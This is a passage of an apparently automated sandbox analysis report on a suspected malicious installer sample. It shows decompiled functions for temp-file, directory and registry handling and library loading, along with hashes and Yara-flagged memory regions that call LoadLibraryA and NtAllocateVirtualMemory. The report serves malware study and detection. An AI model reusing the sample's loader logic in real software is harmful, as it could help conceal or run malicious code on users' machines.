                                                                            				short _v12;
                                                                            				short _t12;
                                                                            				intOrPtr _t13;
                                                                            				signed int _t14;
                                                                            				WCHAR* _t17;
                                                                            				signed int _t19;
                                                                            				signed short _t23;
                                                                            				WCHAR* _t26;
                                                                            
                                                                            				_t26 = _a4;
                                                                            				_t23 = 0x64;
                                                                            				while(1) {
                                                                            					_t12 =  *L"nsa"; // 0x73006e
                                                                            					_t23 = _t23 - 1;
                                                                            					_v12 = _t12;
                                                                            					_t13 =  *0x40a57c; // 0x61
                                                                            					_v8 = _t13;
                                                                            					_t14 = GetTickCount();
                                                                            					_t19 = 0x1a;
                                                                            					_v8 = _v8 + _t14 % _t19;
                                                                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                            					if(_t17 != 0) {
                                                                            						break;
                                                                            					}
                                                                            					if(_t23 != 0) {
                                                                            						continue;
                                                                            					} else {
                                                                            						 *_t26 =  *_t26 & _t23;
                                                                            					}
                                                                            					L4:
                                                                            					return _t17;
                                                                            				}
                                                                            				_t17 = _t26;
                                                                            				goto L4;
                                                                            			}













                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 0040607A
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-944333549
                                                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                            • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                            • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 750 4015c1-4015d5 call 402da6 call 405eb7 755 401631-401634 750->755 756 4015d7-4015ea call 405e39 750->756 758 401663-4022f6 call 401423 755->758 759 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 755->759 763 401604-401607 call 405aeb 756->763 764 4015ec-4015ef 756->764 774 402c2a-402c39 758->774 759->774 776 40165b-40165e 759->776 773 40160c-40160e 763->773 764->763 767 4015f1-4015f8 call 405b08 764->767 767->763 780 4015fa-4015fd call 405a6e 767->780 778 401610-401615 773->778 779 401627-40162f 773->779 776->774 782 401624 778->782 783 401617-401622 GetFileAttributesW 778->783 779->755 779->756 785 401602 780->785 782->779 783->779 783->782 785->773
                                                                            C-Code - Quality: 86%
                                                                            			E004015C1(short __ebx, void* __eflags) {
                                                                            				void* _t17;
                                                                            				int _t23;
                                                                            				void* _t25;
                                                                            				signed char _t26;
                                                                            				short _t28;
                                                                            				short _t31;
                                                                            				short* _t34;
                                                                            				void* _t36;
                                                                            
                                                                            				_t28 = __ebx;
                                                                            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                            				_t17 = E00405EB7(_t16);
                                                                            				_t32 = _t17;
                                                                            				if(_t17 != __ebx) {
                                                                            					do {
                                                                            						_t34 = E00405E39(_t32, 0x5c);
                                                                            						_t31 =  *_t34;
                                                                            						 *_t34 = _t28;
                                                                            						if(_t31 != _t28) {
                                                                            							L5:
                                                                            							_t25 = E00405AEB( *(_t36 + 8));
                                                                            						} else {
                                                                            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                                            								goto L5;
                                                                            							} else {
                                                                            								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                                            							}
                                                                            						}
                                                                            						if(_t25 != _t28) {
                                                                            							if(_t25 != 0xb7) {
                                                                            								L9:
                                                                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                            							} else {
                                                                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                            								if((_t26 & 0x00000010) == 0) {
                                                                            									goto L9;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						 *_t34 = _t31;
                                                                            						_t32 = _t34 + 2;
                                                                            					} while (_t31 != _t28);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                            					_push(0xfffffff5);
                                                                            					E00401423();
                                                                            				} else {
                                                                            					E00401423(0xffffffe6);
                                                                            					E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                            					if(_t23 == 0) {
                                                                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                            					}
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                              • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                            • API String ID: 1892508949-670666241
                                                                            • Opcode ID: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                                                            • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                            • Opcode Fuzzy Hash: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                                                            • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 60%
                                                                            			E004020D8(void* __ebx, void* __eflags) {
                                                                            				struct HINSTANCE__* _t23;
                                                                            				struct HINSTANCE__* _t31;
                                                                            				void* _t32;
                                                                            				WCHAR* _t35;
                                                                            				intOrPtr* _t36;
                                                                            				void* _t37;
                                                                            				void* _t39;
                                                                            
                                                                            				_t32 = __ebx;
                                                                            				asm("sbb eax, 0x434fc0");
                                                                            				 *(_t39 - 4) = 1;
                                                                            				if(__eflags < 0) {
                                                                            					_push(0xffffffe7);
                                                                            					L15:
                                                                            					E00401423();
                                                                            					L16:
                                                                            					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                            					return 0;
                                                                            				}
                                                                            				_t35 = E00402DA6(0xfffffff0);
                                                                            				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                            				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                            					L3:
                                                                            					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                            					_t47 = _t23 - _t32;
                                                                            					 *(_t39 + 8) = _t23;
                                                                            					if(_t23 == _t32) {
                                                                            						_push(0xfffffff6);
                                                                            						goto L15;
                                                                            					}
                                                                            					L4:
                                                                            					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                            					if(_t36 == _t32) {
                                                                            						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                            					} else {
                                                                            						 *(_t39 - 4) = _t32;
                                                                            						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                            							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                                            						} else {
                                                                            							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                            							if( *_t36() != 0) {
                                                                            								 *(_t39 - 4) = 1;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                                            						FreeLibrary( *(_t39 + 8));
                                                                            					}
                                                                            					goto L16;
                                                                            				}
                                                                            				_t31 = GetModuleHandleW(_t35); // executed
                                                                            				 *(_t39 + 8) = _t31;
                                                                            				if(_t31 != __ebx) {
                                                                            					goto L4;
                                                                            				}
                                                                            				goto L3;
                                                                            			}











                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00403418), ref: 004055FA
                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 0040560C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 334405425-0
                                                                            • Opcode ID: 57a0a3861126cd1cf6113bcab6e3fe6859f719f612c4d6b86b9542baaaa6fbc1
                                                                            • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                            • Opcode Fuzzy Hash: 57a0a3861126cd1cf6113bcab6e3fe6859f719f612c4d6b86b9542baaaa6fbc1
                                                                            • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                            				int _t10;
                                                                            				long _t13;
                                                                            				int* _t16;
                                                                            				intOrPtr _t21;
                                                                            				short* _t22;
                                                                            				void* _t24;
                                                                            				void* _t26;
                                                                            				void* _t29;
                                                                            
                                                                            				_t22 = __edi;
                                                                            				_t21 = __edx;
                                                                            				_t16 = __ebx;
                                                                            				_t24 = E00402DE6(_t29, 0x20019);
                                                                            				_t10 = E00402D84(3);
                                                                            				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                            				 *__edi = __ebx;
                                                                            				if(_t24 == __ebx) {
                                                                            					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                            				} else {
                                                                            					 *(_t26 + 8) = 0x3ff;
                                                                            					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                            						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                            						__eflags = _t13;
                                                                            						if(_t13 != 0) {
                                                                            							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                            						}
                                                                            					} else {
                                                                            						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
                                                                            					}
                                                                            					_t22[0x3ff] = _t16;
                                                                            					_push(_t24); // executed
                                                                            					RegCloseKey(); // executed
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseValue
                                                                            • String ID:
                                                                            • API String ID: 397863658-0
                                                                            • Opcode ID: cc6a752f63a426fde86cf9928d668e254d875c271901be1d977c77956d712f75
                                                                            • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                            • Opcode Fuzzy Hash: cc6a752f63a426fde86cf9928d668e254d875c271901be1d977c77956d712f75
                                                                            • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: }|&
                                                                            • API String ID: 0-653347186
                                                                            • Opcode ID: 85c5c80e6103adabe415035f93819484d2f585a537dee9f9bc7fa7d38fbcf92b
                                                                            • Instruction ID: ca2364b3e366102c999e33f23af6601be23b05577be50df3a31dd7f6d5093fc9
                                                                            • Opcode Fuzzy Hash: 85c5c80e6103adabe415035f93819484d2f585a537dee9f9bc7fa7d38fbcf92b
                                                                            • Instruction Fuzzy Hash: 846135319083969FCF369F788AA83DA7FA5AF1A310F04056ECD869F117DB318545CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,02AB9EE4,D6B37BD0,-DB19C8CC), ref: 02AB913B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID: }|&
                                                                            • API String ID: 1029625771-653347186
                                                                            • Opcode ID: 535e079884dc8f3a68de5fcb13f4cebc0888c32d0033f7aae312bf069ee5d83e
                                                                            • Instruction ID: b67bed87bda5d27cc6a34847b74270f916477fc22fabb8cb95df5fda9ed5a544
                                                                            • Opcode Fuzzy Hash: 535e079884dc8f3a68de5fcb13f4cebc0888c32d0033f7aae312bf069ee5d83e
                                                                            • Instruction Fuzzy Hash: 50313D725007459FDF359E398EA87EE37AB9FD9350F51403ACC099B215DF308A468B41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,02AB9EE4,D6B37BD0,-DB19C8CC), ref: 02AB913B
                                                                              • Part of subcall function 02AB9DB7: NtAllocateVirtualMemory.NTDLL ref: 02ABA065
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateLibraryLoadMemoryVirtual
                                                                            • String ID: }|&
                                                                            • API String ID: 2616484454-653347186
                                                                            • Opcode ID: 50e4644f226489818fe894671d5eb275e1adf822dd35ddd6f7c6ae0181c54b45
                                                                            • Instruction ID: 7774308afdab2e2fe6b6b9046a0ff87ba20d5ba5aeac0afed35ce5b57f910640
                                                                            • Opcode Fuzzy Hash: 50e4644f226489818fe894671d5eb275e1adf822dd35ddd6f7c6ae0181c54b45
                                                                            • Instruction Fuzzy Hash: 5611B2716447459FDB21AF798E886EE76AAAF85714F42402ADA588A209DB304A41CF02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,02AB9EE4,D6B37BD0,-DB19C8CC), ref: 02AB913B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID: }|&
                                                                            • API String ID: 1029625771-653347186
                                                                            • Opcode ID: 7ca48be7da4923d80957e66acd6365b8e073fe531586c643dd95235e72cf8e6c
                                                                            • Instruction ID: 552c952d8de153dc40530e23a59c704300cff5c8e286242e5c7c4a41fd6ae8d4
                                                                            • Opcode Fuzzy Hash: 7ca48be7da4923d80957e66acd6365b8e073fe531586c643dd95235e72cf8e6c
                                                                            • Instruction Fuzzy Hash: 7701A2716407865BDF30AF2D9998BDE77B6BF85700F41803AEA1CDB205DA344A018F12
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            			E0040252A(int* __ebx, char* __edi) {
                                                                            				void* _t17;
                                                                            				short* _t18;
                                                                            				void* _t35;
                                                                            				void* _t37;
                                                                            				void* _t40;
                                                                            
                                                                            				_t33 = __edi;
                                                                            				_t27 = __ebx;
                                                                            				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                                            				_t35 = _t17;
                                                                            				_t18 = E00402DA6(0x33);
                                                                            				 *__edi = __ebx;
                                                                            				if(_t35 == __ebx) {
                                                                            					 *(_t37 - 4) = 1;
                                                                            				} else {
                                                                            					 *(_t37 - 0x10) = 0x800;
                                                                            					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                            						L7:
                                                                            						 *_t33 = _t27;
                                                                            						 *(_t37 - 4) = 1;
                                                                            					} else {
                                                                            						if( *(_t37 + 8) == 4) {
                                                                            							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                            							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                            							E00406484(__edi,  *__edi);
                                                                            						} else {
                                                                            							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                            								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                            								_t33[0x7fe] = _t27;
                                                                            							} else {
                                                                            								goto L7;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					_push(_t35); // executed
                                                                            					RegCloseKey(); // executed
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                                            				return 0;
                                                                            			}









                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswCA44.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: 96f832c9e1a127fe746b96bce77bc689ea8785a9dbaacf4930f815db16be5405
                                                                            • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                            • Opcode Fuzzy Hash: 96f832c9e1a127fe746b96bce77bc689ea8785a9dbaacf4930f815db16be5405
                                                                            • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 69%
                                                                            			E00401389(signed int _a4) {
                                                                            				intOrPtr* _t6;
                                                                            				void* _t8;
                                                                            				void* _t10;
                                                                            				signed int _t11;
                                                                            				void* _t12;
                                                                            				signed int _t16;
                                                                            				signed int _t17;
                                                                            				void* _t18;
                                                                            
                                                                            				_t17 = _a4;
                                                                            				while(_t17 >= 0) {
                                                                            					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                            					if( *_t6 == 1) {
                                                                            						break;
                                                                            					}
                                                                            					_push(_t6); // executed
                                                                            					_t8 = E00401434(); // executed
                                                                            					if(_t8 == 0x7fffffff) {
                                                                            						return 0x7fffffff;
                                                                            					}
                                                                            					_t10 = E0040136D(_t8);
                                                                            					if(_t10 != 0) {
                                                                            						_t11 = _t10 - 1;
                                                                            						_t16 = _t17;
                                                                            						_t17 = _t11;
                                                                            						_t12 = _t11 - _t16;
                                                                            					} else {
                                                                            						_t12 = _t10 + 1;
                                                                            						_t17 = _t17 + 1;
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                            						 *0x433eec =  *0x433eec + _t12;
                                                                            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                                            					}
                                                                            				}
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                            • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                            • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                            • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402434(void* __ebx) {
                                                                            				void* _t10;
                                                                            				void* _t14;
                                                                            				long _t18;
                                                                            				intOrPtr _t20;
                                                                            				void* _t22;
                                                                            				void* _t23;
                                                                            
                                                                            				_t14 = __ebx;
                                                                            				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                            				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                            				if( *(_t23 - 0x20) != __ebx) {
                                                                            					_t18 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1);
                                                                            					goto L4;
                                                                            				} else {
                                                                            					_t10 = E00402DE6(_t26, 2); // executed
                                                                            					_t22 = _t10;
                                                                            					if(_t22 == __ebx) {
                                                                            						L6:
                                                                            						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                            					} else {
                                                                            						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                                            						RegCloseKey(_t22);
                                                                            						L4:
                                                                            						if(_t18 != _t14) {
                                                                            							goto L6;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
                                                                            				return 0;
                                                                            			}










                                                                            APIs
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue
                                                                            • String ID:
                                                                            • API String ID: 2831762973-0
                                                                            • Opcode ID: 1ffd97200620b81b13f579f7a6b9042f689ecff3e700d3aee6761a43d8bd64c6
                                                                            • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                                                            • Opcode Fuzzy Hash: 1ffd97200620b81b13f579f7a6b9042f689ecff3e700d3aee6761a43d8bd64c6
                                                                            • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
                                                                            • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
